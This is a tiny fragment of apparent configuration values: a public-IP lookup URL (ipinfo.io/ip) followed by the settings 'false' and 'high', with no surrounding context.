    https://ipinfo.io/ip false
      		high